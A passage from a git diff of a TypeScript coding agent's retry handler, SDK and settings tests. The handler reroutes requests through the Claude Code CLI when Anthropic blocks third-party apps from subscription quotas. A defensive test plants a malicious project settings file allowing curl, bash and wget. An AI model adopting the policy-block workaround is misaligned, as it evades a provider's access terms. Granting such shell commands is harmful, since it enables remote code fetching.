string) => Model | undefined>; +} + +function createMockDeps(overrides?: { + model?: Model; + retryEnabled?: boolean; + markUsageLimitReachedResult?: boolean; + fallbackResult?: any; + findModelResult?: (provider: string, modelId: string) => Model | undefined; + retrySettings?: { + maxRetries?: number; + baseDelayMs?: number; + maxDelayMs?: number; + }; +}): MockDeps { + const model = overrides?.model ?? createMockModel("anthropic", "claude-opus-4-6[1m]"); + const emittedEvents: Array> = []; + const continueFn = mock.fn(async () => {}); + const onModelChangeFn = mock.fn((_model: Model) => {}); + const markUsageLimitReached = mock.fn( + () => overrides?.markUsageLimitReachedResult ?? false, + ); + const findFallback = mock.fn(async () => overrides?.fallbackResult ?? null); + const findModel = mock.fn( + overrides?.findModelResult ?? ((_provider: string, _modelId: string) => undefined), + ); + + const messages: Array<{ role: string } & Record> = []; + + const deps: RetryHandlerDeps = { + agent: { + continue: continueFn, + state: { messages }, + setModel: mock.fn(), + replaceMessages: mock.fn((newMessages: any[]) => { + messages.length = 0; + messages.push(...newMessages); + }), + } as any, + settingsManager: { + getRetryEnabled: () => overrides?.retryEnabled ?? true, + getRetrySettings: () => ({ + enabled: overrides?.retryEnabled ?? true, + maxRetries: overrides?.retrySettings?.maxRetries ?? 5, + baseDelayMs: overrides?.retrySettings?.baseDelayMs ?? 1000, + maxDelayMs: overrides?.retrySettings?.maxDelayMs ?? 30000, + }), + } as unknown as SettingsManager, + modelRegistry: { + authStorage: { + markUsageLimitReached, + }, + find: findModel, + } as unknown as ModelRegistry, + fallbackResolver: { + findFallback, + } as unknown as FallbackResolver, + getModel: () => model, + getSessionId: () => "test-session", + emit: (event: any) => emittedEvents.push(event), + onModelChange: onModelChangeFn, + }; + + return { deps, emittedEvents, continueFn, onModelChangeFn, markUsageLimitReached, findFallback, findModel }; +} + +// ─── _classifyErrorType (tested via handleRetryableError behavior) ────────── + +describe("RetryHandler — long-context entitlement 429 (#2803)", () => { + + describe("error classification", () => { + it("classifies 'Extra usage is required for long context requests' as quota_exhausted, not rate_limit", async () => { + // When the error is classified as quota_exhausted AND no alternate credentials + // AND no fallback, the handler should emit fallback_chain_exhausted and stop. + // If misclassified as rate_limit, it would enter the backoff loop instead. + const { deps, emittedEvents, findModel } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6[1m]"), + markUsageLimitReachedResult: false, // no alternate credentials + fallbackResult: null, // no cross-provider fallback + findModelResult: () => undefined, // no base model either + }); + + const handler = new RetryHandler(deps); + const msg = errorMessage( + '429 {"type":"error","error":{"type":"rate_limit_error","message":"Extra usage is required for long context requests."}}' + ); + + const result = await handler.handleRetryableError(msg); + + // Should NOT retry (would be true if misclassified as rate_limit entering backoff) + assert.equal(result, false); + + // Should emit fallback_chain_exhausted (quota_exhausted path), NOT auto_retry_start (backoff path) + const chainExhausted = emittedEvents.find((e) => e.type === "fallback_chain_exhausted"); + assert.ok(chainExhausted, "Expected fallback_chain_exhausted event for entitlement error"); + + const retryStart = emittedEvents.find((e) => e.type === "auto_retry_start"); + assert.equal(retryStart, undefined, "Should NOT emit auto_retry_start for entitlement error"); + }); + + it("still classifies regular 429 rate limits as rate_limit", async () => { + // A normal "rate limit" 429 should still be classified as rate_limit + const { deps, emittedEvents } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6"), + markUsageLimitReachedResult: false, + fallbackResult: null, + }); + + const handler = new RetryHandler(deps); + const msg = errorMessage("429 Too Many Requests"); + + const result = await handler.handleRetryableError(msg); + + // Should enter the backoff loop (rate_limit path, not quota_exhausted) + assert.equal(result, true); + + const retryStart = emittedEvents.find((e) => e.type === "auto_retry_start"); + assert.ok(retryStart, "Regular 429 should enter backoff retry"); + }); + }); + + describe("long-context model downgrade", () => { + it("downgrades from [1m] to base model when entitlement error and no fallback", async () => { + const baseModel = createMockModel("anthropic", "claude-opus-4-6"); + const { deps, emittedEvents, onModelChangeFn, continueFn } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6[1m]"), + markUsageLimitReachedResult: false, + fallbackResult: null, + findModelResult: (provider: string, modelId: string) => { + if (provider === "anthropic" && modelId === "claude-opus-4-6") return baseModel; + return undefined; + }, + }); + + const handler = new RetryHandler(deps); + const msg = errorMessage("Extra usage is required for long context requests."); + + const result = await handler.handleRetryableError(msg); + + assert.equal(result, true, "Should retry after downgrade"); + + // Should have called setModel with the base model + const setModelCalls = (deps.agent.setModel as any).mock.calls; + assert.equal(setModelCalls.length, 1); + assert.equal(setModelCalls[0].arguments[0].id, "claude-opus-4-6"); + + // Should have notified about model change + assert.equal(onModelChangeFn.mock.calls.length, 1); + + // Should emit a fallback_provider_switch event indicating downgrade + const switchEvent = emittedEvents.find((e) => e.type === "fallback_provider_switch"); + assert.ok(switchEvent, "Expected fallback_provider_switch event for downgrade"); + assert.ok(switchEvent!.reason.includes("long context downgrade"), `reason should mention downgrade: ${switchEvent!.reason}`); + }); + + it("emits fallback_chain_exhausted when base model is also unavailable", async () => { + const { deps, emittedEvents } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6[1m]"), + markUsageLimitReachedResult: false, + fallbackResult: null, + findModelResult: () => undefined, // base model not found + }); + + const handler = new RetryHandler(deps); + const msg = errorMessage("Extra usage is required for long context requests."); + + const result = await handler.handleRetryableError(msg); + + assert.equal(result, false); + const chainExhausted = emittedEvents.find((e) => e.type === "fallback_chain_exhausted"); + assert.ok(chainExhausted, "Expected fallback_chain_exhausted when base model unavailable"); + }); + + it("does not attempt downgrade for non-[1m] models", async () => { + // When a regular model (no [1m] suffix) gets a quota_exhausted error + // with no fallback, it should just stop — no downgrade attempt. + const { deps, emittedEvents } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6"), + markUsageLimitReachedResult: false, + fallbackResult: null, + }); + + const handler = new RetryHandler(deps); + const msg = errorMessage("Extra usage is required for long context requests."); + + const result = await handler.handleRetryableError(msg); + + assert.equal(result, false); + const chainExhausted = emittedEvents.find((e) => e.type === "fallback_chain_exhausted"); + assert.ok(chainExhausted); + + // No downgrade switch should occur + const switchEvent = emittedEvents.find((e) => e.type === "fallback_provider_switch"); + assert.equal(switchEvent, undefined, "Should not switch for non-[1m] models"); + }); + }); + + describe("retry cancellation", () => { + it("cancels queued immediate continue callbacks when retry is aborted", async () => { + const { deps, emittedEvents, continueFn } = createMockDeps({ + markUsageLimitReachedResult: true, + }); + + const handler = new RetryHandler(deps); + const msg = errorMessage("429 Too Many Requests"); + + const result = await handler.handleRetryableError(msg); + assert.equal(result, true, "retry should be initiated"); + + handler.abortRetry(); + await new Promise((resolve) => setTimeout(resolve, 10)); + + assert.equal(continueFn.mock.calls.length, 0, "cancelled retry must not continue after explicit abort"); + const endEvents = emittedEvents.filter((e) => e.type === "auto_retry_end"); + assert.equal(endEvents.length, 1, "retry cancellation should emit a single auto_retry_end event"); + assert.equal(endEvents[0]?.finalError, "Retry cancelled"); + }); + }); + + describe("isRetryableError", () => { + it("considers long-context entitlement error as retryable", () => { + const { deps } = createMockDeps(); + const handler = new RetryHandler(deps); + const msg = errorMessage("Extra usage is required for long context requests."); + assert.equal(handler.isRetryableError(msg), true); + }); + + it("does NOT consider credential cooldown error as retryable (#3429)", () => { + // The credential cooldown message from getApiKey() must not re-enter + // the retry handler. Re-entry creates cascading empty error entries + // in the session file that break resume. + const { deps } = createMockDeps(); + const handler = new RetryHandler(deps); + const msg = errorMessage( + 'All credentials for "anthropic" are in a cooldown window. ' + + 'Please wait a moment and try again, or switch to a different provider.', + ); + assert.equal(handler.isRetryableError(msg), false); + }); + }); + + describe("third-party block claude-code fallback (#3772)", () => { + it("switches to claude-code provider when current provider is anthropic", async () => { + const ccModel = createMockModel("claude-code", "claude-opus-4-6"); + const { deps, emittedEvents, onModelChangeFn } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6"), + findModelResult: (provider: string, modelId: string) => { + if (provider === "claude-code" && modelId === "claude-opus-4-6") return ccModel; + return undefined; + }, + }); + deps.isClaudeCodeReady = () => true; + + const handler = new RetryHandler(deps); + const msg = errorMessage("third-party apps cannot draw from extra usage"); + + const result = await handler.handleRetryableError(msg); + + assert.equal(result, true, "should retry via claude-code fallback"); + const switchEvent = emittedEvents.find((e) => e.type === "fallback_provider_switch"); + assert.ok(switchEvent, "Expected fallback_provider_switch event"); + assert.ok(switchEvent!.to.startsWith("claude-code/"), "Should switch to claude-code provider"); + }); + + it("switches to claude-code on 'out of extra usage' error (#3772)", async () => { + const ccModel = createMockModel("claude-code", "claude-opus-4-6"); + const { deps, emittedEvents } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6"), + findModelResult: (provider: string, modelId: string) => { + if (provider === "claude-code" && modelId === "claude-opus-4-6") return ccModel; + return undefined; + }, + }); + deps.isClaudeCodeReady = () => true; + + const handler = new RetryHandler(deps); + const msg = errorMessage("You're out of extra usage. Add more at claude.ai/settings/usage and keep going."); + + const result = await handler.handleRetryableError(msg); + + assert.equal(result, true, "should retry via claude-code fallback"); + const switchEvent = emittedEvents.find((e) => e.type === "fallback_provider_switch"); + assert.ok(switchEvent, "Expected fallback_provider_switch event"); + assert.ok(switchEvent!.to.startsWith("claude-code/"), "Should switch to claude-code provider"); + }); + + it("does NOT switch to claude-code when current provider is not anthropic", async () => { + const ccModel = createMockModel("claude-code", "gpt-4o"); + const { deps, emittedEvents } = createMockDeps({ + model: createMockModel("openai", "gpt-4o"), + findModelResult: (provider: string, modelId: string) => { + if (provider === "claude-code" && modelId === "gpt-4o") return ccModel; + return undefined; + }, + }); + deps.isClaudeCodeReady = () => true; + + const handler = new RetryHandler(deps); + const msg = errorMessage("third-party apps are not supported for this plan"); + + const result = await handler.handleRetryableError(msg); + + // Should NOT have triggered the claude-code fallback + const switchEvent = emittedEvents.find( + (e) => e.type === "fallback_provider_switch" && e.to?.startsWith("claude-code/"), + ); + assert.equal(switchEvent, undefined, "Should NOT switch non-anthropic provider to claude-code"); + }); + }); + + describe("quota_exhausted credential backoff (#3430)", () => { + it("does NOT call markUsageLimitReached for quota_exhausted errors", async () => { + // "Extra usage is required" is an account-level billing gate. + // Backing off the credential for 30 minutes blocks all provider + // requests and has no effect on the billing condition. + const { deps, markUsageLimitReached } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6[1m]"), + markUsageLimitReachedResult: false, + fallbackResult: null, + findModelResult: () => undefined, + }); + + const handler = new RetryHandler(deps); + const msg = errorMessage( + '429 {"type":"error","error":{"type":"rate_limit_error","message":"Extra usage is required for long context requests."}}', + ); + + await handler.handleRetryableError(msg); + + assert.equal( + markUsageLimitReached.mock.calls.length, + 0, + "markUsageLimitReached must NOT be called for quota_exhausted errors", + ); + }); + + it("still calls markUsageLimitReached for regular rate_limit errors", async () => { + const { deps, markUsageLimitReached } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6"), + markUsageLimitReachedResult: false, + fallbackResult: null, + }); + + const handler = new RetryHandler(deps); + const msg = errorMessage("429 Too Many Requests"); + + await handler.handleRetryableError(msg); + + assert.equal( + markUsageLimitReached.mock.calls.length, + 1, + "markUsageLimitReached should be called for rate_limit errors", + ); + }); + + it("still tries cross-provider fallback for quota_exhausted without credential backoff", async () => { + const fallbackModel = createMockModel("openai", "gpt-4o"); + const { deps, markUsageLimitReached, continueFn } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6[1m]"), + markUsageLimitReachedResult: false, + fallbackResult: { model: fallbackModel, reason: "cross-provider fallback" }, + }); + + const handler = new RetryHandler(deps); + const msg = errorMessage("Extra usage is required for long context requests."); + + const result = await handler.handleRetryableError(msg); + + assert.equal(result, true, "should retry with fallback provider"); + assert.equal( + markUsageLimitReached.mock.calls.length, + 0, + "should NOT back off credentials before trying fallback", + ); + }); + }); +}); diff --git a/packages/pi-coding-agent/src/core/retry-handler.ts b/packages/pi-coding-agent/src/core/retry-handler.ts index f44733086..78d12c8ba 100644 --- a/packages/pi-coding-agent/src/core/retry-handler.ts +++ b/packages/pi-coding-agent/src/core/retry-handler.ts @@ -30,6 +30,9 @@ export interface RetryHandlerDeps { emit: (event: AgentSessionEvent) => void; /** Called when the retry handler switches to a fallback model */ onModelChange: (model: Model) => void; + /** Optional: check if the claude-code CLI provider is ready (installed + authed). + * Injected from the app layer to preserve package boundary. */ + isClaudeCodeReady?: () => boolean; } export class RetryHandler { @@ -37,6 +40,8 @@ export class RetryHandler { private _retryAttempt = 0; private _retryPromise: Promise | undefined = undefined; private _retryResolve: (() => void) | undefined = undefined; + private _retryGeneration = 0; + private _continueTimeout: ReturnType | undefined = undefined; constructor(private readonly _deps: RetryHandlerDeps) {} @@ -107,7 +112,11 @@ export class RetryHandler { if (isContextOverflow(message, contextWindow)) return false; const err = message.errorMessage; - return /overloaded|rate.?limit|too many requests|429|500|502|503|504|service.?unavailable|server.?error|internal.?error|connection.?error|connection.?refused|other side closed|fetch failed|upstream.?connect|reset before headers|terminated|retry delay|network.?(?:is\s+)?unavailable|credentials.*expired|temporarily backed off/i.test( + // "temporarily backed off" is intentionally excluded: it is an internally- + // generated error from getApiKey() when credentials are in a backoff window. + // Re-entering the retry handler for that message creates a cascade of empty + // error entries in the session file, breaking resume (#3429). + return /overloaded|rate.?limit|too many requests|429|500|502|503|504|service.?unavailable|server.?error|internal.?error|connection.?error|connection.?refused|other side closed|fetch failed|upstream.?connect|reset before headers|terminated|retry delay|network.?(?:is\s+)?unavailable|credentials.*expired|extra usage is required|(?:out of|no) extra usage|third.party.*draw from extra|third.party.*not.*available/i.test( err, ); } @@ -134,38 +143,54 @@ export class RetryHandler { } // Try credential fallback before counting against retry budget. + const retryGeneration = this._retryGeneration; if (this._deps.getModel() && message.errorMessage) { - const errorType = this._classifyErrorType(message.errorMessage); - const isCredentialError = errorType !== "unknown"; - const hasAlternate = - isCredentialError && - this._deps.modelRegistry.authStorage.markUsageLimitReached( - this._deps.getModel()!.provider, - this._deps.getSessionId(), - { errorType }, - ); - - if (hasAlternate) { - this._removeLastAssistantError(); - - this._deps.emit({ - type: "auto_retry_start", - attempt: this._retryAttempt + 1, - maxAttempts: settings.maxRetries, - delayMs: 0, - errorMessage: `${message.errorMessage} (switching credential)`, - }); - - // Retry immediately with the next credential - don't increment _retryAttempt - setTimeout(() => { - this._deps.agent.continue().catch(() => {}); - }, 0); - - return true; + // Third-party subscription block (#3772): Anthropic blocks third-party apps + // from using Pro/Max subscription quotas. If the claude-code CLI provider is + // available, switch to it immediately — credential rotation won't help. + if (this._isThirdPartyBlock(message.errorMessage)) { + const switched = this._tryClaudeCodeFallback(message, retryGeneration); + if (switched) return true; + // CLI not available — fall through to standard error handling } - // All credentials are backed off. Try cross-provider fallback before giving up. - if (isCredentialError) { + const errorType = this._classifyErrorType(message.errorMessage); + const isRateLimit = errorType === "rate_limit"; + const isQuotaError = errorType === "quota_exhausted"; + + // Credential rotation — only for transient rate limits (#3430). + // Quota errors ("Extra usage is required") are account-level billing + // gates; rotating to another credential on the same account won't help + // and the 30-minute backoff blocks all provider requests needlessly. + if (isRateLimit) { + const hasAlternate = + this._deps.modelRegistry.authStorage.markUsageLimitReached( + this._deps.getModel()!.provider, + this._deps.getSessionId(), + { errorType }, + ); + + if (hasAlternate) { + this._removeLastAssistantError(); + + this._deps.emit({ + type: "auto_retry_start", + attempt: this._retryAttempt + 1, + maxAttempts: settings.maxRetries, + delayMs: 0, + errorMessage: `${message.errorMessage} (switching credential)`, + }); + + // Retry immediately with the next credential - don't increment _retryAttempt + this._scheduleContinue(retryGeneration); + + return true; + } + } + + // Cross-provider fallback — for rate limits with all creds backed off, + // or quota errors (which skip credential backoff entirely). + if (isRateLimit || isQuotaError) { const fallbackResult = await this._deps.fallbackResolver.findFallback( this._deps.getModel()!, errorType, @@ -193,15 +218,17 @@ export class RetryHandler { }); // Retry immediately with fallback provider - don't increment _retryAttempt - setTimeout(() => { - this._deps.agent.continue().catch(() => {}); - }, 0); + this._scheduleContinue(retryGeneration); return true; } // No fallback available either - if (errorType === "quota_exhausted") { + if (isQuotaError) { + // Try long-context model downgrade ([1m] → base) before giving up + const downgraded = this._tryLongContextDowngrade(message, retryGeneration); + if (downgraded) return true; + this._deps.emit({ type: "fallback_chain_exhausted", reason: `All providers exhausted for ${this._deps.getModel()!.provider}/${this._deps.getModel()!.id}`, @@ -270,7 +297,12 @@ export class RetryHandler { try { await sleep(delayMs, this._retryAbortController.signal); } catch { - // Aborted during sleep + // Aborted during sleep. If the retry generation already advanced, this + // cancellation was handled externally (e.g. explicit model switch). + if (retryGeneration !== this._retryGeneration) { + this._retryAbortController = undefined; + return false; + } const attempt = this._retryAttempt; this._retryAttempt = 0; this._retryAbortController = undefined; @@ -286,16 +318,36 @@ export class RetryHandler { this._retryAbortController = undefined; // Retry via continue() - use setTimeout to break out of event handler chain - setTimeout(() => { - this._deps.agent.continue().catch(() => {}); - }, 0); + this._scheduleContinue(retryGeneration); return true; } /** Cancel in-progress retry */ abortRetry(): void { - this._retryAbortController?.abort(); + const hadRetry = + this._retryPromise !== undefined + || this._retryAbortController !== undefined + || this._continueTimeout !== undefined; + if (!hadRetry) return; + + const attempt = this._retryAttempt > 0 ? this._retryAttempt : 1; + this._retryGeneration++; + if (this._continueTimeout) { + clearTimeout(this._continueTimeout); + this._continueTimeout = undefined; + } + if (this._retryAbortController) { + this._retryAbortController.abort(); + this._retryAbortController = undefined; + } + this._retryAttempt = 0; + this._deps.emit({ + type: "auto_retry_end", + success: false, + attempt, + finalError: "Retry cancelled", + }); this._resolveRetry(); } @@ -326,6 +378,17 @@ export class RetryHandler { } } + private _scheduleContinue(retryGeneration: number): void { + if (this._continueTimeout) { + clearTimeout(this._continueTimeout); + } + this._continueTimeout = setTimeout(() => { + this._continueTimeout = undefined; + if (retryGeneration !== this._retryGeneration) return; + this._deps.agent.continue().catch(() => {}); + }, 0); + } + private _findLastAssistantInMessages( messages: Array<{ role: string } & Record>, ): AssistantMessage | undefined { @@ -343,12 +406,110 @@ export class RetryHandler { */ private _classifyErrorType(errorMessage: string): UsageLimitErrorType { const err = errorMessage.toLowerCase(); + // Long-context entitlement errors are billing gates, not transient rate limits. + // Must be checked before the generic 429/rate_limit regex. + if (/extra usage is required|long context required/i.test(err)) return "quota_exhausted"; if (/quota|billing|exceeded.*limit|usage.*limit/i.test(err)) return "quota_exhausted"; if (/rate.?limit|too many requests|429/i.test(err)) return "rate_limit"; if (/500|502|503|504|server.?error|internal.?error|service.?unavailable/i.test(err)) return "server_error"; return "unknown"; } + /** + * Attempt to downgrade a long-context model (e.g. claude-opus-4-6[1m]) to its + * base model (claude-opus-4-6) when the account lacks the long-context billing + * entitlement. Returns true if the downgrade was initiated. + */ + private _tryLongContextDowngrade(message: AssistantMessage, retryGeneration: number): boolean { + const currentModel = this._deps.getModel(); + if (!currentModel) return false; + + // Only attempt downgrade for [1m] (or similar long-context) model IDs + const match = currentModel.id.match(/^(.+)\[\d+m\]$/); + if (!match) return false; + + const baseModelId = match[1]; + const baseModel = this._deps.modelRegistry.find(currentModel.provider, baseModelId); + if (!baseModel) return false; + + const previousId = currentModel.id; + this._deps.agent.setModel(baseModel); + this._deps.onModelChange(baseModel); + this._removeLastAssistantError(); + + this._deps.emit({ + type: "fallback_provider_switch", + from: `${currentModel.provider}/${previousId}`, + to: `${baseModel.provider}/${baseModel.id}`, + reason: `long context downgrade: ${previousId} → ${baseModel.id}`, + }); + + this._deps.emit({ + type: "auto_retry_start", + attempt: this._retryAttempt + 1, + maxAttempts: this._deps.settingsManager.getRetrySettings().maxRetries, + delayMs: 0, + errorMessage: `${message.errorMessage} (long context downgrade)`, + }); + + this._scheduleContinue(retryGeneration); + + return true; + } + + /** + * Detect Anthropic subscription block errors (#3772). + * These are hard policy blocks, not transient rate limits — credential + * rotation will not help. Matches both the explicit "third-party" message + * and the "out of extra usage" variant that subscription users receive. + */ + private _isThirdPartyBlock(errorMessage: string): boolean { + return /third[- .]party.*(?:draw from extra|not.*available|plan limits|not permitted|cannot be used|not supported)|(?:out of|no) extra usage/i.test(errorMessage); + } + + /** + * Attempt to switch to the claude-code CLI provider when the current + * Anthropic provider is blocked by the third-party policy (#3772). + * Returns true if the switch was made and retry scheduled. + */ + private _tryClaudeCodeFallback(message: AssistantMessage, retryGeneration: number): boolean { + if (!this._deps.isClaudeCodeReady?.()) return false; + + const currentModel = this._deps.getModel(); + if (!currentModel) return false; + + // Only attempt claude-code fallback when the current provider is anthropic. + // Other providers may produce similar error text but should not be rerouted. + if (currentModel.provider !== "anthropic") return false; + + // Find the same model ID under the claude-code provider + const ccModel = this._deps.modelRegistry.find("claude-code", currentModel.id); + if (!ccModel) return false; + + const previousProvider = currentModel.provider; + this._deps.agent.setModel(ccModel); + this._deps.onModelChange(ccModel); + this._removeLastAssistantError(); + + this._deps.emit({ + type: "fallback_provider_switch", + from: `${previousProvider}/${currentModel.id}`, + to: `claude-code/${ccModel.id}`, + reason: "Anthropic subscription blocked for third-party apps — routing through Claude Code CLI", + }); + + this._deps.emit({ + type: "auto_retry_start", + attempt: this._retryAttempt + 1, + maxAttempts: this._deps.settingsManager.getRetrySettings().maxRetries, + delayMs: 0, + errorMessage: `${message.errorMessage} (switching to Claude Code CLI)`, + }); + + this._scheduleContinue(retryGeneration); + return true; + } + /** Remove the last assistant error message from agent state */ private _removeLastAssistantError(): void { const messages = this._deps.agent.state.messages; diff --git a/packages/pi-coding-agent/src/core/sdk.ts b/packages/pi-coding-agent/src/core/sdk.ts index 97e8c5f5e..a0c2d943b 100644 --- a/packages/pi-coding-agent/src/core/sdk.ts +++ b/packages/pi-coding-agent/src/core/sdk.ts @@ -75,6 +75,10 @@ export interface CreateAgentSessionOptions { /** Settings manager. Default: SettingsManager.create(cwd, agentDir) */ settingsManager?: SettingsManager; + + /** Optional: check if the claude-code CLI provider is ready (installed + authed). + * Passed to RetryHandler for third-party block recovery (#3772). */ + isClaudeCodeReady?: () => boolean; } /** Result from createAgentSession */ @@ -214,6 +218,16 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {} } } + // Flush extension provider registrations so extension-provided models (e.g. claude-code/*) + // are available in the registry before model resolution. Without this, findInitialModel() + // cannot find extension models and falls back to built-in providers (#3534). + const extensionsForModelResolution = resourceLoader.getExtensions(); + for (const { name, config } of extensionsForModelResolution.runtime.pendingProviderRegistrations) { + modelRegistry.registerProvider(name, config); + } + // Clear the queue so bindCore() doesn't re-register the same providers. + extensionsForModelResolution.runtime.pendingProviderRegistrations = []; + // If still no model, use findInitialModel (checks settings default, then provider defaults) if (!model) { const result = await findInitialModel({ @@ -326,6 +340,7 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {} transport: settingsManager.getTransport(), thinkingBudgets: settingsManager.getThinkingBudgets(), maxRetryDelayMs: settingsManager.getRetrySettings().maxDelayMs, + externalToolExecution: (m) => modelRegistry.getProviderAuthMode(m.provider) === "externalCli", getApiKey: async (provider) => { // Use the provider argument from the in-flight request; // agent.state.model may already be switched mid-turn. @@ -333,6 +348,10 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {} if (!resolvedProvider) { throw new Error("No model selected"); } + const authMode = modelRegistry.getProviderAuthMode(resolvedProvider); + if (authMode === "externalCli" || authMode === "none") { + return undefined; + } // Retry key resolution with backoff to handle transient network failures // (e.g., OAuth token refresh failing due to brief connectivity loss). @@ -356,16 +375,16 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {} await new Promise(resolve => setTimeout(resolve, baseDelayMs * attempt)); } - // All retries exhausted — throw descriptive error - // Check if credentials exist but are temporarily backed off - // (e.g., after a 429 quota exhaustion). Provide a specific error - // so the retry handler knows this is transient, not a permanent - // auth failure. + // All retries exhausted — throw descriptive error. + // Check if credentials exist but are temporarily in a backoff window + // (e.g., after a 429). This message intentionally avoids phrases like + // "rate limit" / "429" to prevent isRetryableError() from re-entering + // the retry handler and creating cascading error entries (#3429). const hasAuth = modelRegistry.authStorage.hasAuth(resolvedProvider); if (hasAuth) { throw new Error( - `All credentials for "${resolvedProvider}" are temporarily backed off due to rate limiting. ` + - `The request will be retried automatically when backoff expires.`, + `All credentials for "${resolvedProvider}" are in a cooldown window. ` + + `Please wait a moment and try again, or switch to a different provider.`, ); } const model = agent.state.model; @@ -375,8 +394,8 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {} // surface a specific message instead of the misleading "Authentication failed". if (modelRegistry.authStorage.areAllCredentialsBackedOff(resolvedProvider)) { throw new Error( - `Rate limit in effect for "${resolvedProvider}". ` + - `Please wait before retrying or switch to a different model.`, + `All credentials for "${resolvedProvider}" are in a cooldown window. ` + + `Please wait a moment and try again, or switch to a different provider.`, ); } throw new Error( @@ -417,6 +436,7 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {} modelRegistry, initialActiveToolNames, extensionRunnerRef, + isClaudeCodeReady: options.isClaudeCodeReady, }); const extensionsResult = resourceLoader.getExtensions(); diff --git a/packages/pi-coding-agent/src/core/session-manager.test.ts b/packages/pi-coding-agent/src/core/session-manager.test.ts index 7a115443d..470336567 100644 --- a/packages/pi-coding-agent/src/core/session-manager.test.ts +++ b/packages/pi-coding-agent/src/core/session-manager.test.ts @@ -1,5 +1,5 @@ import assert from "node:assert/strict"; -import { describe, it } from "node:test"; +import { describe, it, afterEach } from "node:test"; import { mkdtempSync, rmSync } from "node:fs"; import { join } from "node:path"; import { tmpdir } from "node:os"; @@ -22,44 +22,44 @@ function makeAssistantMessage(input: number, output: number, cacheRead = 0, cach } describe("SessionManager usage totals", () => { - it("tracks assistant usage incrementally without rescanning entries", () => { - const dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-")); - try { - const manager = SessionManager.create(dir, dir); + let dir: string; - manager.appendMessage({ role: "user", content: [{ type: "text", text: "hello" }] } as any); - manager.appendMessage(makeAssistantMessage(10, 5, 3, 2, 0.25)); - manager.appendMessage(makeAssistantMessage(7, 4, 1, 0, 0.1)); - - assert.deepEqual(manager.getUsageTotals(), { - input: 17, - output: 9, - cacheRead: 4, - cacheWrite: 2, - cost: 0.35, - }); - } finally { + afterEach(() => { + if (dir) { rmSync(dir, { recursive: true, force: true }); } }); + it("tracks assistant usage incrementally without rescanning entries", () => { + dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-")); + const manager = SessionManager.create(dir, dir); + + manager.appendMessage({ role: "user", content: [{ type: "text", text: "hello" }] } as any); + manager.appendMessage(makeAssistantMessage(10, 5, 3, 2, 0.25)); + manager.appendMessage(makeAssistantMessage(7, 4, 1, 0, 0.1)); + + assert.deepEqual(manager.getUsageTotals(), { + input: 17, + output: 9, + cacheRead: 4, + cacheWrite: 2, + cost: 0.35, + }); + }); + it("resets totals when starting a new session", () => { - const dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-")); - try { - const manager = SessionManager.create(dir, dir); - manager.appendMessage(makeAssistantMessage(5, 5, 0, 0, 0.05)); - assert.equal(manager.getUsageTotals().input, 5); + dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-")); + const manager = SessionManager.create(dir, dir); + manager.appendMessage(makeAssistantMessage(5, 5, 0, 0, 0.05)); + assert.equal(manager.getUsageTotals().input, 5); - manager.newSession(); - assert.deepEqual(manager.getUsageTotals(), { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - cost: 0, - }); - } finally { - rmSync(dir, { recursive: true, force: true }); - } + manager.newSession(); + assert.deepEqual(manager.getUsageTotals(), { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + cost: 0, + }); }); }); diff --git a/packages/pi-coding-agent/src/core/settings-manager-security.test.ts b/packages/pi-coding-agent/src/core/settings-manager-security.test.ts new file mode 100644 index 000000000..b052a2bd6 --- /dev/null +++ b/packages/pi-coding-agent/src/core/settings-manager-security.test.ts @@ -0,0 +1,102 @@ +import { describe, it, afterEach } from "node:test"; +import assert from "node:assert/strict"; +import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from "node:fs"; +import { join } from "node:path"; +import { tmpdir } from "node:os"; +import { SettingsManager } from "./settings-manager.js"; +import { CONFIG_DIR_NAME } from "../config.js"; + +function makeTempDirs() { + const base = mkdtempSync(join(tmpdir(), "settings-security-test-")); + const agentDir = join(base, "agent"); + const cwd = join(base, "project"); + mkdirSync(agentDir, { recursive: true }); + mkdirSync(join(cwd, CONFIG_DIR_NAME), { recursive: true }); + return { base, agentDir, cwd }; +} + +describe("SettingsManager — global-only security settings", () => { + let tmpBase: string | undefined; + + afterEach(() => { + if (tmpBase) { + rmSync(tmpBase, { recursive: true, force: true }); + tmpBase = undefined; + } + }); + + it("returns allowedCommandPrefixes set via setAllowedCommandPrefixes", () => { + const sm = SettingsManager.inMemory(); + assert.equal(sm.getAllowedCommandPrefixes(), undefined); + sm.setAllowedCommandPrefixes(["sops", "doppler"]); + assert.deepEqual(sm.getAllowedCommandPrefixes(), ["sops", "doppler"]); + }); + + it("returns fetchAllowedUrls set via setFetchAllowedUrls", () => { + const sm = SettingsManager.inMemory(); + assert.equal(sm.getFetchAllowedUrls(), undefined); + sm.setFetchAllowedUrls(["internal.company.com"]); + assert.deepEqual(sm.getFetchAllowedUrls(), ["internal.company.com"]); + }); + + it("strips allowedCommandPrefixes from project settings at load time", () => { + const { base, agentDir, cwd } = makeTempDirs(); + tmpBase = base; + + // Global settings: allowedCommandPrefixes = ["sops"] + writeFileSync(join(agentDir, "settings.json"), JSON.stringify({ + allowedCommandPrefixes: ["sops"], + })); + + // Malicious project settings trying to override with a dangerous command + writeFileSync(join(cwd, CONFIG_DIR_NAME, "settings.json"), JSON.stringify({ + allowedCommandPrefixes: ["curl", "bash", "wget"], + })); + + const sm = SettingsManager.create(cwd, agentDir); + + // The getter reads from globalSettings — project override must be stripped + 